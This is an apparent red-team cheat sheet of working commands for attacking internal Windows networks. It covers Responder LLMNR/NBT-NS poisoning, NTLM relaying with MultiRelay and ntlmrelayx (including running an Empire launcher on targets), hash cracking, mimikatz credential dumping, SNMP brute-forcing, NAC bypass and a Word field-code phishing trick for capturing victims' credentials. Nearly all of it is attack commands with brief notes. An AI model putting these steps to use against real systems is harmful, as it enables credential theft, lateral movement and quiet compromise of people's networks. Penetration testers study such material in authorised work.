# Passive network listening to identify machines
# By default, netdiscover runs in interactive mode (incompatible with clean output)
# Use the -P option to disable interactive mode
sudo netdiscover -p -i eth0
sudo netdiscover -p -i eth0 -P
# You can find the domain name of an IP (reverse lookup) using dig
dig -x IP
# If NAC is blocking, you can listen to broadcast traffic and collect MAC addresses
# A printer's MAC address can be used to bypass NAC
LLMNR / NBT-NS
# You can man-in-the-middle using LLMNR and NBT-NS if they are misconfigured
sudo responder -I eth0 -wFv
# If you capture hashes, you will need to crack them
john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt
Responder and Multirelay
# You can chain Responder and MultiRelay to take control of machines
# It is important to know that SMB Signing must be disabled on the target machines for MultiRelay to work
# The SMB server must also be off in Responder: Responder intercepts and MultiRelay relays the hashes
# HTTP and SMB are set to OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w
# All captured hashes are stored and can be retrieved using the DumpHash.py script
$ sudo python DumpHash.py
# You can check for machines with disabled SMB Signing with RunFinger (impacket) or CrackMapExec
python RunFinger.py -i 10.0.2.0/24
cme smb <CIDR> --gen-relay-list targets.txt
# Then you will target one machine or one range for MultiRelay
python MultiRelay.py -t 10.0.2.4 -u ALL
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
# Then you can get an interactive shell
# and use, for example, mimikatz
mimi sekurlsa::logonpasswords
NTLM Relaying and Proxychains
# Use the SOCKS option when there are multiple sessions to handle
# You can specify a target like this: all://10.1.2.10
# It will target smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp://
./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w
# If someone connects and is relayed, you can list the sessions
ntlmrelayx> socks
# To use the sessions, proxychains can be set up
# /etc/proxychains.conf must point toward the target host
# Then you can use different tools to interact, for example connect through SMB
# If a password is asked for, any value works
proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
SNMP Communities
# You can use metasploit to enumerate known SNMP communities
auxiliary/scanner/snmp/snmp_enum
# OneSixtyOne is another tool
onesixtyone <target> public
# Brute-force community strings using a dictionary (wordlist)
onesixtyone -c wordlist <target>
# Or you can use snmp-check
snmp-check -t 192.168.1.2 -c public/private
Phishing with Responder
# Open Word -> CTRL + F9
# IMPORT "\\\\Responder-IP\\1.jpg"
# Right click and select "Edit Field"
# Tick "Data not stored in document"
# Save & close.
# Open the document -> free credentials :)
Azure AD Recon
https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html
# https://login.microsoftonline.com/getuserrealm.srf?login=username@gothamlab.onmicrosoft.com&xml=1
# If the NameSpaceType indicates "Managed", then the company is using Azure AD.
# Discover accounts
# o365creeper can be used; it does not produce logs on the AD side
https://github.com/LMGsec/o365creeper